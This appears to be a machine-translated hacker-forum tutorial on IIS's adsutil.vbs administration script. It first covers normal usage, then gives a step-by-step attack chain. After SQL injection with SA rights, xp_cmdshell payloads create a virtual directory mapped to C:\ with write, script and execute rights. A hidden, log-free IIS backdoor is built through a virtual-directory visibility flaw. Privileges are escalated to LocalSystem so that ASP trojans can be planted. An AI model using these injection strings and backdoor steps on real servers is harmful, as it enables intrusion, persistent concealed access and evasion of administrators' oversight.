1. Brief Introduction
What is adsutil. vbs? I believe that the network manager who has used IIS will not know. This is a script provided by IIS for managing IIS under the command line. Located in the % SystemDrive % \ Inetpub \ AdminScripts directory. It must be 95,426 bytes in size. Such a large script has powerful functions. This is also true. Basically, I think it is an "Internet Information Service Manager" under the command line ". (In fact, more than 20 original vbs files under % SystemDrive % \ Inetpub \ AdminScripts are available for management on 2000 of servers. By 2003, only one adsutil. vbs is left. It is enough to explain how complicated its functions are)
When adsutil. vbs is mentioned, you have to mention MetaBase. bin. This file is the most important configuration file for IIS. All IIS settings will be stored in this file. IIS manager and adsutil. vbs are displayed to users by reading configuration information for this file. The storage structure of MetaBase. bin is very similar to the Registry and is a tree-type storage structure. IIS manager and adsutil. vbs access MetaBase. bin through an Adspath path. The path starts with IIS: \. LocalHost indicates the local server, and w3svc indicates the IIS service. For example, IIS: \ LocalHost/w3svc/1 indicates the first web site on the local server. IIS: \ LocalHost/w3svc/1/root/Vdir indicates the Vdir virtual directory under the root directory of the first web site.
With this knowledge, let's go back to adsutil. vbs to see its usage:
C: \ Inetpub \ AdminScripts> cscript adsutil. vbs // do not forget to enter the host file name of the script cscript.exe.
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
Usage:
ADSUTIL. VBS <cmd> [<path> [<value>]
Description:
IIS administration utility that enables the configuration of metabase properties
.
Supported Commands: // Supported Commands. This is the most important
GET, SET, ENUM, DELETE, CREATE, COPY,
APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP
PGETSTATUS
Samples: // a few simple examples
Adsutil. vbs GET W3SVC/1/ServerBindings // view the port of the first virtual web site. W3SVC/1 is short for IIS: \ LocalHostW3SVC/1, while ServerBindings is its attribute. The same below.
Adsutil. vbs SET W3SVC/1/ServerBindings ": 81:" // SET the port of the first virtual web site to 81.
Adsutil. vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" // CREATE a virtual directory of MyVdir under the Root directory of the first virtual web site. The following "IIsWebVirtualDir" indicates the directory type.
Adsutil. vbs START_SERVER W3SVC/1 // start the first virtual web site.
Adsutil. vbs ENUM/P W3SVC // view all IIS sites.
For Extended Help type:
Adsutil. vbs HELP // If You Want To further view the HELP, type this command. I won't go around here. Prevent others from saying that I am making a draft fee. You can check it by yourself.
The above "//" text is the comments I added (the same below ). I believe this should be understandable.
The commonly used adsutil. vbs Commands include GET, SET, ENUM, DELETE, and CREATE. Now I will explain one by one:
The GET command is usually used to view the attribute values of directories. SET is used to SET directory properties. ENUM is also used to view attributes. The difference is that he directly displays all the set attributes. A directory usually has several pages to read ...... It has an optional "/p" toggle. If this switch is enabled. It will only list all virtual directories under this directory. The DELETE command is used to DELETE virtual directories. CREATE creates a virtual directory. There are also several commands: START_SERVER, STOP_SERVER, PAUSE_SERVER, and CONTINUE _ SERVER. Start, stop, pause, and continue the virtual site.
The approximate attribute values of a virtual directory are as follows (I only list the values that may be commonly used, otherwise they will be too long ):
KeyType: (STRING) "IIsWebVirtualDir" // directory type. (STRING) indicates that it is a STRING type attribute.
AppRoot: (STRING) "/LM/W3SVC/1/ROOT" // directory IIS path
AppFriendlyName: (STRING) "Default Application" // Application name
AppIsolated: (INTEGER) 2 // specifies whether it is running outside the process or in the process. It is a numeric attribute.
HttpCustomHeaders: (LIST) (1 Items) // custom IIS data Header
"Powered By: www. WoFeiWo. Info"
HttpErrors: (LIST) (42 Items) // page returned by various IIS codes. You can set it yourself. I will omit it here.
DefaultDoc: (STRING) "Default.htm,index.htm, Default. asp, in
Dex. asp, Default. php, index. php, Default. aspx, index. aspx "// The Default homepage name of the directory.
Path: (STRING) "D: \ ftp" // physical Path mapped to the directory
AccessFlags: (INTEGER) 513 // I don't know what it is. I have not set it. It seems that it will be set automatically.
AccessExecute: (BOOLEAN) False // directory execution permission, which is a BOOLEAN Value
AccessSource: (BOOLEAN) False // whether Webdav access to the directory is allowed
AccessRead: (BOOLEAN) True // read-only permission for the Directory
AccessWrite: (BOOLEAN) False // directory write permission
AccessScript: (BOOLEAN) True // whether script execution is allowed in the directory
AccessNoRemoteExecute: (BOOLEAN) False
AccessNoRemoteRead: (BOOLEAN) False
AccessNoRemoteWrite: (BOOLEAN) False
AccessNoRemoteScript: (BOOLEAN) False
AccessNoPhysicalDir: (BOOLEAN) False
ScriptMaps: (LIST) (27 Items) // application extension ing
". Asa, C: \ WINDOWS \ system32 \ inetsrv \ asp. dll, 5, GET, HEAD, POST, TRACE"
". Asp, C: \ WINDOWS \ system32 \ inetsrv \ asp. dll, 5, GET, HEAD, POST, TRACE"
". Aspx, C: \ WINDOWS \ Microsoft. NET \ Framework \ v1.1.4322 \ aspnet_isapi.dll, 1, GET, HEA
D, POST, DEBUG"
.................. // N multiple data is omitted here
AspEnableParentPaths: (BOOLEAN) True
AppPoolId: (STRING) "DefaultAppPool" // application pool name
DontLog: (BOOLEAN) True // disable IISLog records
DirBrowseFlags: (INTEGER)-1073741762.
EnableDirBrowsing: (BOOLEAN) True // whether the column directory is allowed
DirBrowseShowDate: (BOOLEAN) True // here and below are the parameter settings for displaying directories. English is simple. I will not talk about it anymore.
DirBrowseShowTime: (BOOLEAN) True
DirBrowseShowSize: (BOOLEAN) True
DirBrowseShowExtension: (BOOLEAN) True
DirBrowseShowLongDate: (BOOLEAN) True
EnableDefaultDoc: (BOOLEAN) True // whether to enable the default homepage document
The above is what I saw on my machine using the cscript adsutil. vbs ENUM w3svc/1/root command. You can also enter the preceding command to study the problem.
All the above attributes can be SET through the SET command. The method is as follows:
Cscript adsutil. vbs SET w3svc/1/root/directory name/attribute name Setting Value
For example, cscript adsutil. vbs SET w3svc/1/root/wofeiwo/AccessRead 1 // SET the read permission of the wofeiwo virtual directory under the first virtual web site to true
Or: cscript adsutil. vbs SET w3svc/1/root/wofeiwo/Path "C: \" // SET the directory ing Path to "C :\"
Let's take a look at our simple examples.
Ii. Use of adsutil. vbs
(1) A new idea of MSSQL Injection upload
You may encounter this situation in MSSQL injection: SA permission. Run the Cmd command (xp_cmdshell, sp_OACreate, Job, and so on ). However, the server is on the Intranet. Outside is a bastion host. Only port 80 is mapped. 3389 is useless (cannot be connected via intranet), and all reverse Trojans cannot be transferred (Tftp, Ftp, Wget, exe2bat, etc.). What should you do at this time?
Amanl's classic "squeeze the last drop of MSSQL blood" gives us a good idea: Create a new virtual directory using vbs under % SystemDrive % \ Inetpub \ AdminScripts. Customize the absolute path of the ing. In this way, the absolute path of the web can be guessed. Then, back up the database or temporary table to the virtual directory (or directly echo) through BACKUP or MASKWEBTASK to get a shell.
The above idea is indeed good. However, anyone who has used GetWebShell or NBUpFile that is too bad to eat knows how low the success rate of BACKUP or MASKWEBTASK is ...... Echo ...... I don't want to talk about it anymore. Writing one line in one row is simply looking for guilt. (Keep turning special characters ......)
In fact, we can improve the idea of Amanl. When we create a new virtual directory. You can add the write directory permission. Add Webdav ...... Can we directly upload any files through IIS soon? It is not limited to text files. If we upload a reverse backdoor and execute it through SA ...... Well, everything is done!
Coming soon:
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir "';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs cscript adsutil. vbs SET w3svc/1/root/wofeiwo/Path "C :\"';--
Note that the special characters above must be changed by yourself. Alternatively, you can run the preceding command using nbsi2.
In this way, a wofeiwo virtual directory is created under the first web site and mapped to the C: root directory. I added the read and write permissions to him. To get a webshell, I added the script execution permission:
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/AccessRead 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/AccessScript 1 ';--
A friend who has read Surperhei's use of IIS write permission may want to construct an http packet to upload files. In fact, there are simpler methods:
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/AccessSource 1 ';--
Set to allow access to the column directory and webdav, then open your IE, Ctrl + O open the "open" dialog box, and type the virtual directory you just set. Select "open as Web folder" and click OK.
Figure 1
Aha! Have you seen all the folders? :
Figure 2
Now you can operate on the above files just like a normal folder. You can also press Ctrl + C or Ctrl + V to copy the file. This feature allows you to easily upload and modify files.
(2) Further Steps
In fact, we can use the above ideas to directly create an IIS backdoor. To see my implementations! (Here we use the method described in "almost perfect IIS backdoor. However, I directly used the MS tool adsutil. vbs to complete the settings. If you are interested in this article, you can find it by yourself .)
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir" '; -- // first CREATE a wofeiwo directory.
Exec Master .. xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir" '; -- // another door directory is created under the wofeiwo directory.
Exec Master .. xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs cscript adsutil. vbs SET w3svc/1/root/wofeiwo/door/Path "C: \" '; -- // SET the door directory to map to the C: root directory.
Exec Master .. xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1'; -- // you can SET a permission for the directory as follows. You can refer to the preceding command annotations.
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1 ';--
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1 ';--
Some may say, what. Isn't it the same as above? Haha. In fact, you should take a closer look. We will find that the first directory "wofeiwo" we created above has not set the "Path" attribute. That is to say, it is not mapped to any actual directory. Here, an IIS vulnerability (IIS5.0.1.0) is applied ). That is, virtual directories without the "Path" attribute will not appear in the IIS manager. It is equivalent to a hidden directory. The virtual directory "door" under it is also invisible because the parent directory is invisible! However, the "door" directory is configured with the "Path" attribute. So if we submit the http: // IP/wofeiwo/door/path. The result is the file directory under C. Now we can write any file to read this directory. You can also run the program in the System32 directory. Our backdoor prototype was built. (Note that I have added the AccessExecute execution permission)
However, all programs we execute are the default IUSR user Guest permissions of IIS. We are always upset that we do not have a large permission. Next, we will improve our permissions. If you add an IUSR user as the administrator, we will not talk about it. The following two methods are described:
1. Set AppIsolated so that the program in this directory is in the IIS process. In this way, the System permission of IIS is inherited.
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/1/Root/wofeiwo/door/AppIsolated 0 ';--
2. Add asp. dll that resolves asp files to the privileged dll of IIS. Make it run in the process. To the LocalSystem permission of IIS.
1) first obtain all the IIS privileged dll
Exec Master.. Xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs GET w3svc/InProcessIsapiApps ';--
Return Value:
InProcessIsapiApps: (LIST) (5 Items)
"C: \ WINDOWS \ system32 \ inetsrv \ httpext. dll"
"C: \ WINDOWS \ system32 \ inetsrv \ httpodbc. dll"
"C: \ WINDOWS \ system32 \ inetsrv \ ssinc. dll"
"C: \ WINDOWS \ system32 \ msw3prt. dll"
"C: \ WINDOWS \ Microsoft. NET \ Framework \ v1.1.4322 \ aspnet_isapi.dll"
2) Set asp. dll to the InProcessIsapiApps Group. Note that all the dll files found above are added, otherwise they will be deleted.
Exec Master .. xp_CmdShell 'Cscript.exe % SystemDrive % \ Inetpub \ AdminScripts \ adsutil. vbs SET w3svc/InProcessIsapiApps "C: \ WINDOWS \ system32 \ inetsrv \ httpext. dll "" C: \ WINDOWS \ system32 \ inetsrv \ httpodbc. dll "" C: \ WINDOWS \ system32 \ inetsrv \ ssinc. dll "" C: \ WINDOWS \ system32 \ msw3prt. dll "" C: \ WINDOWS \ Microsoft. NET \ Framework \ v1.1.4322 \ aspnet_isapi.dll "" C: \ WINDOWS \ system32 \ inetsrv \ asp. dll "';--
Return Value:
InProcessIsapiApps: (LIST) "C: \ WINDOWS \ system32 \ inetsrv \ httpext. dll "" C: \ WINDOWS \ system32 \ inetsrv \ httpodbc. dll "" C: \ WINDOWS \ system32 \ inetsrv \ ssinc. dll "" C: \ WINDOWS \ system32 \ msw3prt. dll "" C: \ WINDOWS \ Microsoft. NET \ Framework \ v1.1.4322 \ aspnet_isapi.dll "" C: \ WINDOWS \ system32 \ inetsrv \ asp. dll"
In this way, the settings are complete. In the future, no matter what asp file is, it will be the LoaclSystem permission. Follow these steps. Our IIS backdoor is basically set. You can upload asp Trojans for auxiliary control. Such a configured backdoor is hard to be discovered by administrators. And communicates completely through port 80 of IIS. No log records. So it is quite safe.
III. Statement
Here, a simple application of adsutil. vbs is over. I suddenly found that the article has been written so much. Wow ...... The article is well written. I am a newbie. There are inevitable omissions in the article. For more information, see. If you have any questions, please contact me. My mail: wofeiwo@bugkidz.org. Or you can come to Firefox Technology Alliance http://www.wrsky.com to find me. My ID: Not me. Is the moderator of the new forum version.